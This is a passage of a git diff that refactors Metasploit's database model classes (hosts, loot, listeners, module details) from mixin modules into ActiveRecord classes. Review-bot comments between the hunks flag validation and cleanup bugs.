ret[:os_sp] = $2 - else - ret[:os_name] = oses.first - end - - ret[:name] = data[:hname] - when 'host.os.qualys_fingerprint' - # :os=>"Microsoft Windows 2000" - # :os=>"Windows 2003" - # :os=>"Microsoft Windows XP Professional SP3" - # :os=>"Ubuntu Linux" - # :os=>"Cisco IOS 12.0(3)T3" - case data[:os] - when /Windows/ - ret.update(parse_windows_os_str(data[:os])) - else - parts = data[:os].split(/\s+/, 3) - ret[:os_name] = "" - ret[:os_name] = parts[0] if parts[0] - ret[:os_name] << " " + parts[1] if parts[1] - ret[:os_sp] = parts[2] if parts[2] - end - # XXX: We should really be using smb_version's stored fingerprints - # instead of parsing the service info manually. Disable for now so we - # don't count smb twice. 
- #when 'smb.fingerprint' - # # smb_version is kind enough to store everything we need directly - # ret.merge(fp.data) - # # If it's windows, this should be a pretty high-confidence - # # fingerprint. Otherwise, it's samba which doesn't give us much of - # # anything in most cases. - # ret[:certainty] = 1.0 if fp.data[:os_name] =~ /Windows/ - when 'host.os.fusionvm_fingerprint' - case data[:os] - when /Windows/ - ret.update(parse_windows_os_str(data[:os])) - when /Linux ([^[:space:]]*) ([^[:space:]]*) .* (\(.*\))/ - ret[:os_name] = "Linux" - ret[:name] = $1 - ret[:os_sp] = $2 - ret[:arch] = get_arch_from_string($3) - else - ret[:os_name] = data[:os] - end - ret[:arch] = data[:arch] if data[:arch] - ret[:name] = data[:name] if data[:name] - else - # If you've fallen through this far, you've hit a generalized - # pass-through fingerprint parser. - ret[:os_name] = data[:os_name] || data[:os] || data[:os_fingerprint] || "" - ret[:type] = data[:os_purpose] if data[:os_purpose] - ret[:arch] = data[:os_arch] if data[:os_arch] - ret[:certainty] = data[:os_certainty] || 0.5 - end - ret[:certainty] ||= 0.8 - ret - end - - # - # Take a windows version string and return a hash with fields suitable for - # Host this object's version fields. - # - # A few example strings that this will have to parse: - # sessions - # Windows XP (Build 2600, Service Pack 3). - # Windows .NET Server (Build 3790). - # Windows 2008 (Build 6001, Service Pack 1). - # retina - # Windows Server 2003 (X64), Service Pack 2 - # nessus - # Microsoft Windows 2000 Advanced Server (English) - # qualys - # Microsoft Windows XP Professional SP3 - # Windows 2003 - # - # Note that this list doesn't include nexpose or nmap, since they are - # both kind enough to give us the various strings in seperate pieces - # that we don't have to parse out manually. 
- # - def parse_windows_os_str(str) - ret = {} - - ret[:os_name] = "Microsoft Windows" - arch = get_arch_from_string(str) - ret[:arch] = arch if arch - - if str =~ /(Service Pack|SP) ?(\d+)/ - ret[:os_sp] = "SP#{$2}" - end - - # Flavor - case str - when /\.NET Server/ - ret[:os_flavor] = "2003" - when /(XP|2000 Advanced Server|2000|2003|2008|SBS|Vista|7 .* Edition|7)/ - ret[:os_flavor] = $1 - else - # If we couldn't pull out anything specific for the flavor, just cut - # off the stuff we know for sure isn't it and hope for the best - ret[:os_flavor] ||= str.gsub(/(Microsoft )?Windows|(Service Pack|SP) ?(\d+)/, '').strip - end - - if str =~ /NT|2003|2008|SBS|Server/ - ret[:type] = 'server' - else - ret[:type] = 'client' - end - - ret - end - - # A case switch to return a normalized arch based on a given string. - def get_arch_from_string(str) - case str - when /x64|amd64|x86_64/i - "x64" - when /x86|i[3456]86/i - "x86" - when /PowerPC|PPC|POWER|ppc/ - "ppc" - when /SPARC/i - "sparc" - when /MIPS/i - "mips" - when /ARM/i - "arm" - else - nil - end - end - - } # end class_eval block +class Mdm::Host < ActiveRecord::Base + include Mdm::Host::OperatingSystemNormalization + + # + # Callbacks + # + + before_destroy :cleanup_tags + + # + # CONSTANTS + # + + # Fields searched for the search scope + SEARCH_FIELDS = [ + 'address::text', + 'hosts.name', + 'os_name', + 'os_flavor', + 'os_sp', + 'mac', + 'purpose', + 'comments' + ] + + # + # Relations + # + + has_many :exploit_attempts, :dependent => :destroy, :class_name => 'Mdm::ExploitAttempt' + has_many :exploited_hosts, :dependent => :destroy, :class_name => 'Mdm::ExploitedHost' + has_many :clients, :dependent => :delete_all, :class_name => 'Mdm::Client' + has_many :host_details, :dependent => :destroy, :class_name => 'Mdm::HostDetail' + # hosts_tags are cleaned up in before_destroy: + has_many :hosts_tags, :class_name => 'Mdm::HostTag' + has_many :loots, :dependent => :destroy, :class_name => 'Mdm::Loot', :order => 
'loots.created_at desc' + has_many :notes, :dependent => :delete_all, :class_name => 'Mdm::Note', :order => 'notes.created_at' + has_many :services, :dependent => :destroy, :class_name => 'Mdm::Service', :order => 'services.port, services.proto' + has_many :sessions, :dependent => :destroy, :class_name => 'Mdm::Session', :order => 'sessions.opened_at' + has_many :vulns, :dependent => :delete_all, :class_name => 'Mdm::Vuln' + belongs_to :workspace, :class_name => 'Mdm::Workspace' + + # + # Through host_tags + # + has_many :tags, :through => :hosts_tags, :class_name => 'Mdm::Tag' + + # + # Through services + # + has_many :creds, :through => :services, :class_name => 'Mdm::Cred' + has_many :service_notes, :through => :services + has_many :web_sites, :through => :services, :class_name => 'Mdm::WebSite' + + # + # Nested Attributes + # @note Must be declared after relations being referenced. + # + + accepts_nested_attributes_for :services, :reject_if => lambda { |s| s[:port].blank? }, :allow_destroy => true + + # + # Validations + # + + validates :address, + :exclusion => { + :in => ['127.0.0.1'] + }, + :ip_format => true, + :presence => true, + :uniqueness => { + :scope => :workspace_id, + :unless => :ip_address_invalid? + } + validates :workspace, :presence => true + + # + # Scopes + # + + scope :alive, where({'hosts.state' => 'alive'}) + scope :flagged, where('notes.critical = true AND notes.seen = false').includes(:notes) + scope :search, + lambda { |*args| + # @todo replace with AREL + terms = SEARCH_FIELDS.collect { |field| + "#{field} ILIKE ?" 
+ } + disjunction = terms.join(' OR ') + formatted_parameter = "%#{args[0]}%" + parameters = [formatted_parameter] * SEARCH_FIELDS.length + conditions = [disjunction] + parameters + + { + :conditions => conditions + } + } + scope :tag_search, + lambda { |*args| where("tags.name" => args[0]).includes(:tags) } + + def attribute_locked?(attr) + n = notes.find_by_ntype("host.updated.#{attr}") + n && n.data[:locked] end + + def cleanup_tags + # No need to keep tags with no hosts + tags.each do |tag| + tag.destroy if tag.hosts == [self] + end + # Clean up association table records + Mdm::HostTag.delete_all("host_id = #{self.id}") + end + + # This is replicated by the IpAddressValidator class. Had to put it here as well to avoid + # SQL errors when checking address uniqueness. + def ip_address_invalid? + begin + potential_ip = IPAddr.new(address) + return true unless potential_ip.ipv4? || potential_ip.ipv6? + rescue ArgumentError + return true + end + end + + def is_vm? + !!self.virtual_host + end + + ActiveSupport.run_load_hooks(:mdm_host, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/host_detail.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/host_detail.rb index e8cc41eb5e..f99a6b320c 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/host_detail.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/host_detail.rb 
@@ -1,8 +1,15 @@
-module MetasploitDataModels::ActiveRecordModels::HostDetail
- def self.included(base)
- base.class_eval {
- belongs_to :host, :class_name => "Mdm::Host", :counter_cache => :host_detail_count
- validates :host_id, :presence => true
- }
- end
+class Mdm::HostDetail < ActiveRecord::Base
+ #
+ # Relations
+ #
+
+ belongs_to :host, :class_name => 'Mdm::Host', :counter_cache => :host_detail_count
+
+ #
+ # Validations
+ #
+
+ validates :host_id, :presence => true
+
+ ActiveSupport.run_load_hooks(:mdm_host_detail, self)
 end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/host_tag.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/host_tag.rb
index 57948955d6..9301885d7f 100755
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/host_tag.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/host_tag.rb
@@ -1,10 +1,13 @@
-module MetasploitDataModels::ActiveRecordModels::HostTag
- def self.included(base)
- base.class_eval {
- base.table_name = "hosts_tags"
- belongs_to :host, :class_name => "Mdm::Host"
- belongs_to :tag, :class_name => "Mdm::Tag"
- }
- end
+class Mdm::HostTag < ActiveRecord::Base
+ self.table_name = "hosts_tags"
+
+ #
+ # Relations
+ #
+
+ belongs_to :host, :class_name => 'Mdm::Host'
+ belongs_to :tag, :class_name => 'Mdm::Tag'
+
+ ActiveSupport.run_load_hooks(:mdm_host_tag, self)
 end
 end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/imported_cred.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/imported_cred.rb
index 0c72598a5b..a65111b953 100755
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/imported_cred.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/imported_cred.rb
@@ -1,9 +1,10 @@ -module MetasploitDataModels::ActiveRecordModels::ImportedCred - def self.included(base) - base.class_eval{ +class Mdm::ImportedCred < ActiveRecord::Base + # + # Relations + # - belongs_to :workspace, :class_name => "Mdm::Workspace" - } - end + belongs_to :workspace, :class_name => "Mdm::Workspace" + + ActiveSupport.run_load_hooks(:mdm_imported_cred, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/listener.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/listener.rb index 75c0af9c53..dae8922fa8 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/listener.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/listener.rb @@ -1,14 +1,24 @@ -module MetasploitDataModels::ActiveRecordModels::Listener - def self.included(base) - base.class_eval{ +class Mdm::Listener < ActiveRecord::Base + # + # Relations + # - belongs_to :workspace, :class_name => "Mdm::Workspace" - belongs_to :task, :class_name => "Mdm::Task" + belongs_to :task, :class_name => 'Mdm::Task' + belongs_to :workspace, :class_name => 'Mdm::Workspace' - serialize :options, ::MetasploitDataModels::Base64Serializer.new - validates :address, :presence => true, :ip_format => true - validates :port, :presence => true - } - end + # + # Serializations + # + + serialize :options, MetasploitDataModels::Base64Serializer.new + + # + # Validations + # + + validates :address, :ip_format => true, :presence => true + validates :port, :presence => true + + ActiveSupport.run_load_hooks(:mdm_listener, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/loot.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/loot.rb index ec0ae2e0b1..0f343c318a 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/loot.rb 
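Review bot: In Mdm::Listener, `validates :port, :presence => true` accepts any non-blank value, so an out-of-range or non-numeric port can be stored. Mdm::NexposeConsole in this same patch already constrains its port with `:inclusion => {:in => 1..65535}`. Unless listeners need a value outside that range (not visible here), the same bound fits: `validates :port, :presence => true, :inclusion => {:in => 1..65535}`.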
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/loot.rb @@ -1,35 +1,63 @@ -module MetasploitDataModels::ActiveRecordModels::Loot - def self.included(base) - base.class_eval { +class Mdm::Loot < ActiveRecord::Base + # + # Callbacks + # - belongs_to :workspace, :class_name => "Mdm::Workspace" - belongs_to :host, :class_name => "Mdm::Host" - belongs_to :service, :class_name => "Mdm::Service" + before_destroy :delete_file - serialize :data, ::MetasploitDataModels::Base64Serializer.new + # + # CONSTANTS + # - before_destroy :delete_file + RELATIVE_SEARCH_FIELDS = [ + 'ltype', + 'name', + 'info', + 'data' + ] - scope :search, lambda { |*args| - where(["loots.ltype ILIKE ? OR " + - "loots.name ILIKE ? OR " + - "loots.info ILIKE ? OR " + - "loots.data ILIKE ?", - "%#{args[0]}%", "%#{args[0]}%", "%#{args[0]}%", "%#{args[0]}%" - ]) - } + # + # Relations + # - private + belongs_to :host, :class_name => 'Mdm::Host' + belongs_to :service, :class_name => 'Mdm::Service' + belongs_to :workspace, :class_name => 'Mdm::Workspace' - def delete_file - c = Pro::Client.get rescue nil - if c - c.loot_delete_file(self[:id]) - else - ::File.unlink(self.path) rescue nil - end - end + # + # Scopes + # + + scope :search, lambda { |*args| + # @todo replace with AREL + terms = RELATIVE_SEARCH_FIELDS.collect { |relative_field| + "loots.#{relative_field} ILIKE ?" } + disjunction = terms.join(' OR ') + formatted_parameter = "%#{args[0]}%" + parameters = [formatted_parameter] * RELATIVE_SEARCH_FIELDS.length + conditions = [disjunction] + parameters + + where(conditions) + } + + # + # Serializations + # + + serialize :data, MetasploitDataModels::Base64Serializer.new + + private + + def delete_file + c = Pro::Client.get rescue nil + if c + c.loot_delete_file(self[:id]) + else + ::File.unlink(self.path) rescue nil + end end + + ActiveSupport.run_load_hooks(:mdm_loot, self) end 
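Review bot: The fallback branch of `delete_file` in Mdm::Loot runs `::File.unlink(self.path) rescue nil`, which removes whatever path the row holds and discards every error. Nothing in this hunk checks that `path` resolves inside the directory where loot is stored, so if the column can be set from imported or user-supplied data (not visible here), destroying a record could delete an unrelated file. I would expand the path, confirm it sits under the expected storage root before unlinking, and rescue only `Errno::ENOENT` so permission and path errors are reported. The same method body appears in report.rb, report_template.rb and task.rb in this patch.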
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/macro.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/macro.rb index e9ccd50d1b..e6dcefb4fb 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/macro.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/macro.rb @@ -1,15 +1,20 @@ -module MetasploitDataModels::ActiveRecordModels::Macro - def self.included(base) - base.class_eval{ +class Mdm::Macro < ActiveRecord::Base + extend MetasploitDataModels::SerializedPrefs - extend MetasploitDataModels::SerializedPrefs + # + # Serialization + # - serialize :actions, ::MetasploitDataModels::Base64Serializer.new - serialize :prefs, ::MetasploitDataModels::Base64Serializer.new - serialized_prefs_attr_accessor :max_time + serialize :actions, MetasploitDataModels::Base64Serializer.new + serialize :prefs, MetasploitDataModels::Base64Serializer.new + serialized_prefs_attr_accessor :max_time - validates :name, :presence => true, :format => /^[^'|"]+$/ - } - end + # + # Validations + # + + validates :name, :presence => true, :format => /^[^'|"]+$/ + + ActiveSupport.run_load_hooks(:mdm_macro, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/mod_ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/mod_ref.rb index cfbe57a40c..62592400df 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/mod_ref.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/mod_ref.rb @@ -1,6 +1,3 @@ -module MetasploitDataModels::ActiveRecordModels::ModRef - def self.included(base) - base.class_eval{ - } - end +class Mdm::ModRef < ActiveRecord::Base + ActiveSupport.run_load_hooks(:mdm_mod_ref, self) end 
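Review bot: The name format in Mdm::Macro, `/^[^'|"]+$/`, is anchored with `^` and `$`, which in Ruby match at line boundaries and not at the ends of the string. A value containing a newline therefore passes as soon as one of its lines satisfies the pattern, so the excluded quote and pipe characters can still appear on another line. Anchoring the whole string closes that: `validates :name, :presence => true, :format => /\A[^'|"]+\z/`. The same anchors are used for the name formats in report.rb and tag.rb in this patch.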
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_action.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_action.rb index 23e67da6f1..4263f6b1c6 100644 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_action.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_action.rb @@ -1,9 +1,16 @@ -module MetasploitDataModels::ActiveRecordModels::ModuleAction - def self.included(base) - base.class_eval{ - base.table_name = "module_actions" - belongs_to :module_detail - validate :name, :presence => true - } - end +class Mdm::ModuleAction < ActiveRecord::Base + self.table_name = 'module_actions' + + # + # Relations + # + + belongs_to :module_detail, :class_name => 'Mdm::ModuleDetail' + + # + # Validations + # + validate :name, :presence => true + + ActiveSupport.run_load_hooks(:mdm_module_action, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_arch.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_arch.rb index 656068d39f..b27656ac87 100644 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_arch.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_arch.rb @@ -1,9 +1,17 @@ -module MetasploitDataModels::ActiveRecordModels::ModuleArch - def self.included(base) - base.class_eval{ - base.table_name = "module_archs" - belongs_to :module_detail - validate :name, :presence => true - } - end +class Mdm::ModuleArch < ActiveRecord::Base + self.table_name = 'module_archs' + + # + # Relations + # + + belongs_to :module_detail, :class_name => 'Mdm::ModuleDetail' + + # + # Validations + # + + validate :name, :presence => true + + ActiveSupport.run_load_hooks(:mdm_module_arch, self) end 
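Review bot: `validate :name, :presence => true` in Mdm::ModuleAction uses the singular `validate`, which as I read the ActiveModel API registers a method called `name` as a custom validation and does not attach a presence validator. If so, a blank name is accepted and the `validates_associated` calls in Mdm::ModuleDetail check nothing for it. The line was carried over unchanged from the old module, and the likely intent is `validates :name, :presence => true`. The same line appears in module_arch.rb, module_author.rb, module_mixin.rb, module_platform.rb, module_ref.rb and module_target.rb, and as `validate :refname, :presence => true` in module_detail.rb.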
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_author.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_author.rb index b279c88043..22f98fd7c8 100644 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_author.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_author.rb @@ -1,9 +1,17 @@ -module MetasploitDataModels::ActiveRecordModels::ModuleAuthor - def self.included(base) - base.class_eval{ - base.table_name = "module_authors" - belongs_to :module_detail - validate :name, :presence => true - } - end +class Mdm::ModuleAuthor < ActiveRecord::Base + self.table_name = 'module_authors' + + # + # Relations + # + + belongs_to :module_detail + + # + # Validations + # + + validate :name, :presence => true + + ActiveSupport.run_load_hooks(:mdm_module_author, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_detail.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_detail.rb index 503e39869b..0e8dd17fa1 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_detail.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_detail.rb 
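Review bot: `belongs_to :module_detail` in Mdm::ModuleAuthor is left without a class name, while module_action.rb, module_arch.rb, module_mixin.rb and module_ref.rb in this patch were changed to `belongs_to :module_detail, :class_name => 'Mdm::ModuleDetail'`. The association probably still resolves through the namespace, but the models should agree so a later reader does not look for a reason behind the difference. module_platform.rb and module_target.rb have the same omission.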
@@ -1,67 +1,73 @@ -module MetasploitDataModels::ActiveRecordModels::ModuleDetail - def self.included(base) - base.class_eval { - base.table_name = "module_details" +class Mdm::ModuleDetail < ActiveRecord::Base + self.table_name = 'module_details' - has_many :authors, :class_name => "Mdm::ModuleAuthor", :dependent => :destroy, :source => :module_author - has_many :mixins, :class_name => "Mdm::ModuleMixin", :dependent => :destroy, :source => :module_mixin - has_many :targets, :class_name => "Mdm::ModuleTarget", :dependent => :destroy, :source => :module_target - has_many :actions, :class_name => "Mdm::ModuleAction", :dependent => :destroy, :source => :module_action - has_many :refs, :class_name => "Mdm::ModuleRef", :dependent => :destroy, :source => :module_ref - has_many :archs, :class_name => "Mdm::ModuleArch", :dependent => :destroy, :source => :module_arch - has_many :platforms, :class_name => "Mdm::ModulePlatform", :dependent => :destroy, :source => :module_platform + # + # Relations + # - validate :refname, :presence => true + has_many :actions, :class_name => 'Mdm::ModuleAction', :dependent => :destroy, :source => :module_action + has_many :archs, :class_name => 'Mdm::ModuleArch', :dependent => :destroy, :source => :module_arch + has_many :authors, :class_name => 'Mdm::ModuleAuthor', :dependent => :destroy, :source => :module_author + has_many :mixins, :class_name => 'Mdm::ModuleMixin', :dependent => :destroy, :source => :module_mixin + has_many :platforms, :class_name => 'Mdm::ModulePlatform', :dependent => :destroy, :source => :module_platform + has_many :refs, :class_name => 'Mdm::ModuleRef', :dependent => :destroy, :source => :module_ref + has_many :targets, :class_name => 'Mdm::ModuleTarget', :dependent => :destroy, :source => :module_target - validates_associated :authors - validates_associated :mixins - validates_associated :targets - validates_associated :actions - validates_associated :archs - validates_associated :platforms - validates_associated 
:refs + # + # Validations + # - def add_author(name, email=nil) - if email - r = self.authors.build(:name => name, :email => email).save - else - self.authors.build(:name => name).save - end - end + validate :refname, :presence => true - def add_mixin(name) - self.mixins.build(:name => name).save - end + validates_associated :actions + validates_associated :archs + validates_associated :authors + validates_associated :mixins + validates_associated :platforms + validates_associated :refs + validates_associated :targets - def add_target(idx, name) - self.targets.build(:index => idx, :name => name).save - end - - def add_action(name) - self.actions.build(:name => name).save - end - - def add_ref(name) - self.refs.build(:name => name).save - end - - def add_arch(name) - self.archs.build(:name => name).save - end - - def add_platform(name) - self.platforms.build(:name => name).save - end - - def before_destroy - Mdm::ModuleAuthor.delete_all('module_detail_id = ?', self.id) - Mdm::ModuleMixin.delete_all('module_detail_id = ?', self.id) - Mdm::ModuleTarget.delete_all('module_detail_id = ?', self.id) - Mdm::ModuleAction.delete_all('module_detail_id = ?', self.id) - Mdm::ModuleRef.delete_all('module_detail_id = ?', self.id) - Mdm::ModuleArch.delete_all('module_detail_id = ?', self.id) - Mdm::ModulePlatform.delete_all('module_detail_id = ?', self.id) - end - } + def add_author(name, email=nil) + if email + r = self.authors.build(:name => name, :email => email).save + else + self.authors.build(:name => name).save + end end + + def add_mixin(name) + self.mixins.build(:name => name).save + end + + def add_target(idx, name) + self.targets.build(:index => idx, :name => name).save + end + + def add_action(name) + self.actions.build(:name => name).save + end + + def add_ref(name) + self.refs.build(:name => name).save + end + + def add_arch(name) + self.archs.build(:name => name).save + end + + def add_platform(name) + self.platforms.build(:name => name).save + end + + def 
before_destroy + Mdm::ModuleAuthor.delete_all('module_detail_id = ?', self.id) + Mdm::ModuleMixin.delete_all('module_detail_id = ?', self.id) + Mdm::ModuleTarget.delete_all('module_detail_id = ?', self.id) + Mdm::ModuleAction.delete_all('module_detail_id = ?', self.id) + Mdm::ModuleRef.delete_all('module_detail_id = ?', self.id) + Mdm::ModuleArch.delete_all('module_detail_id = ?', self.id) + Mdm::ModulePlatform.delete_all('module_detail_id = ?', self.id) + end + + ActiveSupport.run_load_hooks(:mdm_module_detail, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_mixin.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_mixin.rb index 8f0258d4a1..89b86c4061 100644 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_mixin.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_mixin.rb @@ -1,9 +1,17 @@ -module MetasploitDataModels::ActiveRecordModels::ModuleMixin - def self.included(base) - base.class_eval{ - base.table_name = "module_mixins" - belongs_to :module_detail - validate :name, :presence => true - } - end +class Mdm::ModuleMixin < ActiveRecord::Base + self.table_name = 'module_mixins' + + # + # Relations + # + + belongs_to :module_detail, :class_name => 'Mdm::ModuleDetail' + + # + # Validation + # + + validate :name, :presence => true + + ActiveSupport.run_load_hooks(:mdm_module_mixin, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_platform.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_platform.rb index 9d484e42f8..83f897fb13 100644 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_platform.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_platform.rb 
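Review bot: In Mdm::ModuleDetail, `def before_destroy` calls `delete_all('module_detail_id = ?', self.id)` with the bind value as a second positional argument. As far as I can tell `delete_all` takes a single conditions argument, so this would raise ArgumentError if the method ever runs; the array form is `Mdm::ModuleAuthor.delete_all(['module_detail_id = ?', id])`. The method is also a plain instance method and not registered through the `before_destroy` macro, unlike the other models in this patch, and every association it cleans already declares `:dependent => :destroy`, so removing the method may be the simpler fix. Separately, `r = self.authors.build(...)` in `add_author` assigns a local that is never read.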
@@ -1,9 +1,17 @@ -module MetasploitDataModels::ActiveRecordModels::ModulePlatform - def self.included(base) - base.class_eval{ - base.table_name = "module_platforms" - belongs_to :module_detail - validate :name, :presence => true - } - end +class Mdm::ModulePlatform < ActiveRecord::Base + self.table_name = 'module_platforms' + + # + # Relations + # + + belongs_to :module_detail + + # + # Validations + # + + validate :name, :presence => true + + ActiveSupport.run_load_hooks(:mdm_module_platform, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_ref.rb index 8bffa365a9..6368d8d02f 100644 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_ref.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_ref.rb @@ -1,9 +1,17 @@ -module MetasploitDataModels::ActiveRecordModels::ModuleRef - def self.included(base) - base.class_eval{ - base.table_name = "module_refs" - belongs_to :module_detail - validate :name, :presence => true - } - end +class Mdm::ModuleRef < ActiveRecord::Base + self.table_name = 'module_refs' + + # + # Relations + # + + belongs_to :module_detail, :class_name => 'Mdm::ModuleDetail' + + # + # Validations + # + + validate :name, :presence => true + + ActiveSupport.run_load_hooks(:mdm_module_ref, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_target.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_target.rb index 7e52b1a296..b3e3b026f8 100644 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_target.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_target.rb 
@@ -1,9 +1,17 @@ -module MetasploitDataModels::ActiveRecordModels::ModuleTarget - def self.included(base) - base.class_eval{ - base.table_name = "module_targets" - belongs_to :module_detail - validate :name, :presence => true - } - end +class Mdm::ModuleTarget < ActiveRecord::Base + self.table_name = 'module_targets' + + # + # Relations + # + + belongs_to :module_detail + + # + # Validators + # + + validate :name, :presence => true + + ActiveSupport.run_load_hooks(:mdm_module_target, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/nexpose_console.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/nexpose_console.rb index fd31df59f5..fd40f462d8 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/nexpose_console.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/nexpose_console.rb @@ -1,14 +1,20 @@ -module MetasploitDataModels::ActiveRecordModels::NexposeConsole - def self.included(base) - base.class_eval{ - serialize :cached_sites, ::MetasploitDataModels::Base64Serializer.new +class Mdm::NexposeConsole < ActiveRecord::Base + # + # Serializations + # - validates :name, :presence => true - validates :address, :presence => true - validates :username, :presence => true - validates :password, :presence => true - validates :port, :inclusion => {:in => 1..65535} - } - end + serialize :cached_sites, MetasploitDataModels::Base64Serializer.new + + # + # Validations + # + + validates :address, :presence => true + validates :name, :presence => true + validates :password, :presence => true + validates :port, :inclusion => {:in => 1..65535} + validates :username, :presence => true + + ActiveSupport.run_load_hooks(:mdm_nexpose_console, self) end 
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/note.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/note.rb index 5cee9628b9..a1e3d81671 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/note.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/note.rb 
